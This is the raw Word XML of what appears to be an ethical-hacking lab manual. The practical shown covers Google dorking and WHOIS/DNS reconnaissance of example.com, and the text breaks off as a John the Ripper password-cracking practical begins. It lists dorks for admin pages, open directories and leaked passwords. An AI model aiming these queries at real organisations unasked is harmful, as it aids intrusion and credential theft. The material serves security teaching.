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858B" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="19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6213DE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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0F47B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Title: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Google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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFDB71" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D223FD7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Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A84DE9F" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="00377F23">
      <w:pPr>
        <w:spacing w:before="44" w:line="278" w:lineRule="auto"/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To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collect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analyze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publicly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available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information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about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target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organization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or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 xml:space="preserve">domain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Google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Dorking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WHOIS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lookup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techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE54F6" w14:textId="1EB756AD" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="00377F23">
      <w:pPr>
        <w:spacing w:before="44" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b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F1099D5" wp14:editId="2AEA410B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>256849</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5733415" cy="165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155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4191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33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334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24458" id="Group 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:20.2pt;width:451.45pt;height:1.3pt;z-index:-251661312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&#10;bWxQSwUGAAAAAAQABADzAAAAvgcAAAAA&#10;">
                <v:shape id="Graphic 3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PmwAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva6oui1SjqCB4Euqf+6N5NsXmpTbRVj/9RhD2OMzMb5j5srOVeFDjS8cKRsMEBHHu&#10;dMmFgtNx+z0F4QOyxsoxKXiSh+Wi9zXHVLuWM3ocQiEihH2KCkwIdSqlzw1Z9ENXE0fv4hqLIcqm&#10;kLrBNsJtJcdJ8istlhwXDNa0MZRfD3erQLe3u/557c3x1p7Xmb0ULhutlBr0u9UMRKAu/Ic/7Z1W&#10;MIH3lXgD5OIPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATbRj5s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11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hEwwAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6sbQFolZRcTSXmOtxNsj+0yi2bdhdzXpv+8WCj0OM/MNk69H04k7Od9aVjCfJSCI&#10;K6tbrhUcPt+eFiB8QNbYWSYF3+RhvZo85JhpO3BB932oRYSwz1BBE0KfSemrhgz6me2Jo3e2zmCI&#10;0tVSOxwi3HQyTZJXabDluNBgT9uGquv+ZhTcToev4+74XrjdJW3nZSgpTZ+VepyOmyWIQGP4D/+1&#10;P7SCF/i9Em+AXP0AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAjV2IR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6" o:spid="_x0000_s1030" style="position:absolute;left:57299;top:41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Q+gwwAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Bd9huAU3pU7qQkp0DG1AIrooNXmAS+bmx2TuhMw0xrd3CoUuD+fn4+yS2fRiotG1lhW8rSIQ&#10;xKXVLdcKivzw+g7CeWSNvWVScCcHyX7xtMNY2xt/03TxtQgj7GJU0Hg/xFK6siGDbmUH4uBVdjTo&#10;gxxrqUe8hXHTy3UUbaTBlgOhwYHShsru8mMC91qdv7Kqc8WnzNPrS5elp3um1PJ5/tiC8DT7//Bf&#10;+6gVbOD3SrgBcv8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdK0PoMMAAADaAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,9144r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 7" o:spid="_x0000_s1031" style="position:absolute;left:3;top:13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3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ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CE5249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Part</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2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Google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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76378A17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Open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web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browser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and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go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to</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
          <w:rPr>
            <w:b/>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>https://www.google.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BB990D0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Identify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the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target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domain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(example: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example.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F54A2A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Perform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basic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searches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652AF57D" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="202"/>
        <w:ind w:left="1887" w:hanging="359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example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C189A25" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="196"/>
        <w:ind w:left="188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"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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company"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contact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DE6033" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="196"/>
        <w:ind w:left="1887" w:hanging="359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"example.com"</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="4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confidential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D4770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spacing w:before="196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Use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advanced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Google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dorks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A7565" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4228"/>
        </w:tabs>
        <w:spacing w:before="250"/>
        <w:ind w:left="1213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Google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Dork</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55867822" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4228"/>
        </w:tabs>
        <w:spacing w:before="261" w:line="470" w:lineRule="auto"/>
        <w:ind w:left="1213" w:right="3286"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>site:example.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Lists indexed pages </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>site:example.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-14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filetype:pdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="4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Finds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PDF</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2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documents </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>site:example.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>inurl:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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Finds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admin/login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 xml:space="preserve">pages </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>intitle: "index of"</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Finds open directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BBA564" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4228"/>
        </w:tabs>
        <w:spacing w:line="470" w:lineRule="auto"/>
        <w:ind w:left="1213" w:right="2646"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cache:example.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Views cached pages "example.com" password</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Searches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for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leaked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 xml:space="preserve">credentials </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>related:example.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Finds related websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4BC88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spacing w:before="0" w:line="256" w:lineRule="exact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Analyze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results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for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exposed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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8160A7" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="201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Save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URLs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screenshots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for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documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765F029" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2" w:rsidP="00377F23">
      <w:pPr>
        <w:rPr>
          <w:b/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BB3AB9" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="61"/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lastRenderedPageBreak/>
        <w:t>Part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B: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 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C89F47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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Visit</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
          <w:rPr>
            <w:b/>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>https://who.is</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C9338FD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Enter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the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target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domain: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example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE25B6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spacing w:before="202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Analyze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the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output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9B53A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ind w:left="1887" w:hanging="359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Registrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAA1A29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spacing w:before="195"/>
        <w:ind w:left="1887" w:hanging="359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Registrant</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b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organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA5130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spacing w:before="196"/>
        <w:ind w:left="1887" w:hanging="359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Contact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email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC9846A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spacing w:before="197"/>
        <w:ind w:left="188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Name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servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9B883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spacing w:before="196"/>
        <w:ind w:left="188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Creation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expiration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dates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245869E9" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="196"/>
        <w:ind w:left="188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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-19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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3CDD5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spacing w:before="195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Perform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reverse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lookup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(optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C5B71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spacing w:before="202"/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Use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command-line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(optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CC9A7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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F40F013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Perform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DNS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lookup (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946CBAA" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="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example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C000C87" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="205"/>
        <w:ind w:left="448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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED73BA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dig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example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C183BC" w14:textId="77777777" w:rsidR="00377F23" w:rsidRPr="00ED13DB" w:rsidRDefault="00377F23" w:rsidP="00377F23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2923C692" w14:textId="721982F2" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000" w:rsidP="00377F23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C859B61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Using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Google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WHOIS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reconnaissance,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the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following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information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was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collected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6CCB8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Domain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ownership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details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76085CFF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spacing w:before="205"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Registrar</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E49EA5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Domain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lifecycle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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6EB19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Name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servers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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895D8AD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spacing w:before="202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Admin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technical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contact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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A64056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Internal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URLs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and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directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFEF4C3" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Publicly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accessible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documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F776FD6" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="18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0A51C4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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF8AC5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12AB74BF" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="201" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="92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Encryption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RC4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Cracking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John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Ripper </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA7A4F" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="exac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understand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demonstrate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65230802" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
